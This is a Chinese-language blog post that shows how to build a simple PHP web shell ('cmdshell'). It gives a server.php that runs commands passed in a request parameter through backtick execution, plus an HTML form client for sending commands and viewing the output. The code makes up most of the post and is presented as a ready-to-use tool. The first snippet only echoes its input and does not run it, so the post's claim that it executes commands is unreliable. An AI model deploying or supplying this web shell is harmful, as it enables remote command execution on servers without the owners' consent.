一个简单的php cmdshell
1. 一句话执行CMDSHELL 适用于Windows~~
新建个server.php
<?php echo $_REQUEST[cmd]; ?>
访问 http://localhost/server.php?cmd=要执行的命令
可惜显示没有排序
2. 为了让它变好看点
<head> <meta charset="gbk"> </head> <p style="color:green"> <?php echo `$_REQUEST[123]`; ?> <PRE> </p>
3.输URL太麻烦
自己做个客户端
新建一个client.html
<meta charset="utf-8"> <style type="text/css"> </style> <body bgcolor=black> <p > <center> <meta charset="utf-8"> <form name="f" action="http://localhost/server.php"; target="abc"> <input type="text" name="cmd" id="cmd"> <input type="submit" value="执行" id="aaa"></form> <iframe id="if" name="abc" src="http://localhost/server.php" width="100%" height="600" frameborder="0"> <!--把localhost/server.php换成你php的地址就行了--> </iframe> </center> </p> </body>
哈哈完成啦!美观又漂亮
CM部落 》原创,转载请保留文章出处。
本文链接:一个简单的php cmdshell https://www.itkz.cn/note/26.html
版权声明:若无特殊注明,本文皆为《
正文到此结束
发表吐槽
你肿么看?
已有2条吐槽